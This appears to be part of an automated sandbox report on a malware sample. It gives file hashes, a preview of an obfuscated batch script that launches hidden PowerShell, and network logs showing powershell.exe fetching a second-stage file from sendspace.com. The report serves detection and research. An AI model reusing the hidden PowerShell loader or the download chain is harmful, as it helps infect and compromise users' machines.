                                                                                                SSDEEP:6144:JIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uN2dwBCswSbn:6XD94+WlLZMM6YFHg+n
                                                                                                MD5:EBE9AC19CCCC47FFABE69664A5B60132
                                                                                                SHA1:B8261C103C84ACF3A328D4C2FD6ABDCB7ED4DD43
                                                                                                SHA-256:2BB267DB6CF4E0FE6372CA92678796BF0A6394BF4B9EA3B17235FCAF3AF13133
                                                                                                SHA-512:482C147E3F87118F946E2EF1D7EAE3583DD1E895432C414443F1A8C7289F8D9477EC3A282DD9D25BE26868B2DA2EEEF36049CFF2FFA031886B45AADA32403841
                                                                                                Malicious:false
                                                                                                Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmJ\..D................................................................................................................................................................................................................................................................................................................................................k..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Windows\svchost.com

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):41472
                                                                                                Entropy (8bit):4.812812916305451
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:sPpOlINgIP79gB3pzhTkR6ETphjuuVnSk8YXiGHgrHL6Zh9oWIkUinksTyCOeM:sEl9bbSVh7VWYOzL49oWPksTyIM
                                                                                                MD5:E11C7C303771F18E1542B2C742879D3F
                                                                                                SHA1:C37CBCA2FD214FB68A62BACAC27D54C660DF91ED
                                                                                                SHA-256:4770F9E9EF9F85A0E5DED7D6EC4BF56EEF45C831EF623C3DCE84EFFBA40ADDAC
                                                                                                SHA-512:D9A274D422793A73E8E8BC4745882C7AF0CE34341A62385DA2C026BAB58AAAF6E49044CEF8FFEF68EF24FDD95DEBCD16FA4E79598D29885D6E4A9707B6884A8E
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:ASCII text, with very long lines (6478), with no line terminators
                                                                                                Entropy (8bit):5.246900424773366
                                                                                                TrID:
                                                                                                  File name:las.cmd
                                                                                                  File size:6'478 bytes
                                                                                                  MD5:f96b390af9be44e21ffec109cb107462
                                                                                                  SHA1:716dda50fc30581e587c0a3d8c65d45aefbfec14
                                                                                                  SHA256:c73db3a4bf51b48059eef2a5003feafc43dc7e93bf8c70fb51a0423c212d85a7
                                                                                                  SHA512:09fdcbc4b6153d37889c4b91f9ce996b5b1131ca50db1f3749420860e2731da915babc6a379e64b762c2cb2f4bf399760dae5b48adffba8ca95ce44b71fdd649
                                                                                                  SSDEEP:96:vNL+Uex09u1ayG4ZJSpIOzmJOH2BLE6BNMi9SioPrHu1v7Pn/VKdgoZcLA4sKLUd:vNHbyG4ZJeJzmJYsqju1v7Poqo7zKwd
                                                                                                  TLSH:0ED16E4B860DBA4D01EB7B0C718E46524DE8C73D892EC55E7D0B56C320CDE2932BD3A1
                                                                                                  File Content Preview:start /min powershell.exe -windowstyle hidden "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen

                                                                                                  File Icon

                                                                                                  Icon Hash:9686878b929a9886

                                                                                                  Network Behavior

                                                                                                  Network Port Distribution

                                                                                                  TCP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  May 23, 2024 21:08:47.542397022 CEST49730443192.168.2.4172.67.170.105
                                                                                                  May 23, 2024 21:08:47.542438984 CEST44349730172.67.170.105192.168.2.4
                                                                                                  May 23, 2024 21:08:47.542514086 CEST49730443192.168.2.4172.67.170.105
                                                                                                  May 23, 2024 21:08:47.553978920 CEST49730443192.168.2.4172.67.170.105
                                                                                                  May 23, 2024 21:08:47.553994894 CEST44349730172.67.170.105192.168.2.4
                                                                                                  May 23, 2024 21:08:48.039161921 CEST44349730172.67.170.105192.168.2.4
                                                                                                  May 23, 2024 21:08:48.039257050 CEST49730443192.168.2.4172.67.170.105
                                                                                                  May 23, 2024 21:08:48.041462898 CEST49730443192.168.2.4172.67.170.105
                                                                                                  May 23, 2024 21:08:48.041474104 CEST44349730172.67.170.105192.168.2.4
                                                                                                  May 23, 2024 21:08:48.041820049 CEST44349730172.67.170.105192.168.2.4
                                                                                                  May 23, 2024 21:08:48.051506996 CEST49730443192.168.2.4172.67.170.105
                                                                                                  May 23, 2024 21:08:48.098490953 CEST44349730172.67.170.105192.168.2.4
                                                                                                  May 23, 2024 21:08:48.347827911 CEST44349730172.67.170.105192.168.2.4
                                                                                                  May 23, 2024 21:08:48.348006010 CEST44349730172.67.170.105192.168.2.4
                                                                                                  May 23, 2024 21:08:48.348069906 CEST49730443192.168.2.4172.67.170.105
                                                                                                  May 23, 2024 21:08:48.350712061 CEST49730443192.168.2.4172.67.170.105
                                                                                                  May 23, 2024 21:08:48.407509089 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:48.407541990 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:48.407617092 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:48.408018112 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:48.408031940 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.158787012 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.158930063 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.162131071 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.162138939 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.162564993 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.164485931 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.210500002 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.380094051 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.380124092 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.380141020 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.380316973 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.380337954 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.380585909 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.401885033 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.401909113 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.402082920 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.402093887 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.402157068 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.465982914 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.466003895 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.466123104 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.466133118 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.466176987 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.482760906 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.482791901 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.482862949 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.482872009 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.482914925 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.496315002 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.496336937 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.496401072 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.496414900 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.496457100 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.527508020 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.527534008 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.527600050 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.527611971 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.527623892 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.527668953 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.574621916 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.574646950 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.574754000 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.574764013 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.574816942 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.595529079 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.595551014 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.595823050 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.595832109 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.595877886 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.609539986 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.609565973 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.609632015 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.609641075 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.609683037 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.619028091 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.619051933 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.619107008 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.619115114 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.619144917 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.619163036 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.668030024 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.668061018 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.668098927 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.668111086 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.668138027 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.668152094 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.687397003 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.687422991 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.687477112 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.687486887 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.687516928 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.687535048 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.698587894 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.698616982 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.698667049 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.698676109 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.698724031 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.706780910 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.706814051 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.706974030 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.706974030 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.706984997 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.707029104 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.714847088 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.714883089 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.714955091 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.714971066 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.714981079 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.715014935 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.721905947 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.721927881 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.722004890 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.722012997 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.722054958 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.731924057 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.731947899 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.732040882 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.732074976 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.732115030 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.742399931 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.742419004 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.742508888 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.742520094 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.742566109 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.750296116 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.750322104 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.750380993 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.750389099 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.750431061 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.758099079 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.758124113 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.758179903 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.758188009 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.758229017 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.765176058 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.765202045 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.765259027 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.765268087 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.765290022 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.765316963 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.772059917 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.772083998 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.772154093 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.772162914 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.772207022 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.776995897 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.777019978 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.777101040 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.777112007 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.777157068 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.781971931 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.781996012 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.782040119 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.782048941 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.782078981 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.782099962 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.789573908 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.789599895 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.789665937 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.789673090 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.789716959 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.835374117 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.835402012 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.835520029 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.835541964 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.835596085 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.840054989 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.840106010 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.840137005 CEST4434973169.31.136.17192.168.2.4
                                                                                                  May 23, 2024 21:08:49.840137005 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.840167999 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.840243101 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:08:49.840517044 CEST49731443192.168.2.469.31.136.17
                                                                                                  May 23, 2024 21:09:12.915028095 CEST49738443192.168.2.4172.67.170.105
                                                                                                  May 23, 2024 21:09:12.915074110 CEST44349738172.67.170.105192.168.2.4
                                                                                                  May 23, 2024 21:09:12.915138960 CEST49738443192.168.2.4172.67.170.105
                                                                                                  May 23, 2024 21:09:12.937446117 CEST49738443192.168.2.4172.67.170.105
                                                                                                  May 23, 2024 21:09:12.937482119 CEST44349738172.67.170.105192.168.2.4
                                                                                                  May 23, 2024 21:09:13.757489920 CEST44349738172.67.170.105192.168.2.4
                                                                                                  May 23, 2024 21:09:13.757574081 CEST49738443192.168.2.4172.67.170.105
                                                                                                  May 23, 2024 21:09:13.861987114 CEST49738443192.168.2.4172.67.170.105
                                                                                                  May 23, 2024 21:09:13.862003088 CEST44349738172.67.170.105192.168.2.4
                                                                                                  May 23, 2024 21:09:13.862319946 CEST44349738172.67.170.105192.168.2.4
                                                                                                  May 23, 2024 21:09:13.862371922 CEST49738443192.168.2.4172.67.170.105
                                                                                                  May 23, 2024 21:09:13.866616964 CEST49738443192.168.2.4172.67.170.105
                                                                                                  May 23, 2024 21:09:13.910490990 CEST44349738172.67.170.105192.168.2.4
                                                                                                  May 23, 2024 21:09:14.286819935 CEST44349738172.67.170.105192.168.2.4
                                                                                                  May 23, 2024 21:09:14.286885023 CEST44349738172.67.170.105192.168.2.4
                                                                                                  May 23, 2024 21:09:14.286889076 CEST49738443192.168.2.4172.67.170.105
                                                                                                  May 23, 2024 21:09:14.286932945 CEST49738443192.168.2.4172.67.170.105
                                                                                                  May 23, 2024 21:09:14.291155100 CEST49738443192.168.2.4172.67.170.105
                                                                                                  May 23, 2024 21:09:14.291177034 CEST44349738172.67.170.105192.168.2.4
                                                                                                  May 23, 2024 21:09:14.359184980 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:14.359217882 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:14.359400034 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:14.359766006 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:14.359782934 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.065455914 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.065553904 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.069479942 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.069492102 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.069740057 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.069873095 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.070235014 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.114495993 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.401386976 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.401416063 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.401432991 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.402503967 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.402520895 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.402952909 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.428036928 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.428057909 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.428180933 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.428194046 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.429282904 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.492178917 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.492199898 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.492316008 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.492330074 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.492377996 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.512284040 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.512301922 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.512381077 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.512388945 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.512432098 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.527154922 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.527173996 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.527255058 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.527264118 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.527304888 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.554120064 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.554137945 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.554231882 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.554243088 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.554287910 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.560230970 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.560327053 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.560337067 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.560384035 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.560672045 CEST49739443192.168.2.469.31.136.57
                                                                                                  May 23, 2024 21:09:15.560703039 CEST4434973969.31.136.57192.168.2.4
                                                                                                  May 23, 2024 21:09:15.560755968 CEST49739443192.168.2.469.31.136.57

                                                                                                  UDP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  May 23, 2024 21:08:47.500967026 CEST5430353192.168.2.41.1.1.1
                                                                                                  May 23, 2024 21:08:47.513350964 CEST53543031.1.1.1192.168.2.4
                                                                                                  May 23, 2024 21:08:48.351973057 CEST5607253192.168.2.41.1.1.1
                                                                                                  May 23, 2024 21:08:48.406651974 CEST53560721.1.1.1192.168.2.4
                                                                                                  May 23, 2024 21:09:14.295062065 CEST6220453192.168.2.41.1.1.1
                                                                                                  May 23, 2024 21:09:14.355365992 CEST53622041.1.1.1192.168.2.4

                                                                                                  DNS Queries

                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  May 23, 2024 21:08:47.500967026 CEST192.168.2.41.1.1.10xec0Standard query (0)www.sendspace.comA (IP address)IN (0x0001)false
                                                                                                  May 23, 2024 21:08:48.351973057 CEST192.168.2.41.1.1.10x8c06Standard query (0)fs03n2.sendspace.comA (IP address)IN (0x0001)false
                                                                                                  May 23, 2024 21:09:14.295062065 CEST192.168.2.41.1.1.10xa01aStandard query (0)fs13n4.sendspace.comA (IP address)IN (0x0001)false

                                                                                                  DNS Answers

                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  May 23, 2024 21:08:47.513350964 CEST1.1.1.1192.168.2.40xec0No error (0)www.sendspace.com172.67.170.105A (IP address)IN (0x0001)false
                                                                                                  May 23, 2024 21:08:47.513350964 CEST1.1.1.1192.168.2.40xec0No error (0)www.sendspace.com104.21.28.80A (IP address)IN (0x0001)false
                                                                                                  May 23, 2024 21:08:48.406651974 CEST1.1.1.1192.168.2.40x8c06No error (0)fs03n2.sendspace.com69.31.136.17A (IP address)IN (0x0001)false
                                                                                                  May 23, 2024 21:09:14.355365992 CEST1.1.1.1192.168.2.40xa01aNo error (0)fs13n4.sendspace.com69.31.136.57A (IP address)IN (0x0001)false

                                                                                                  HTTP Request Dependency Graph

                                                                                                  • www.sendspace.com
                                                                                                  • fs03n2.sendspace.com
                                                                                                  • fs13n4.sendspace.com

                                                                                                  HTTPS Proxied Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.449730172.67.170.1054437596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-05-23 19:08:48 UTC174OUTGET /pro/dl/wlorhs HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                  Host: www.sendspace.com
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-05-23 19:08:48 UTC942INHTTP/1.1 301 Moved Permanently
                                                                                                  Date: Thu, 23 May 2024 19:08:48 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: SID=agl7gcfidedl89v3md884jkcv1; path=/; domain=.sendspace.com
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                  Pragma: no-cache
                                                                                                  Location: https://fs03n2.sendspace.com/dlpro/90cd9178b57ca9e755cc53ffd63d0a44/664f9440/wlorhs/Undertaker.pcx
                                                                                                  Vary: Accept-Encoding
                                                                                                  CF-Cache-Status: DYNAMIC
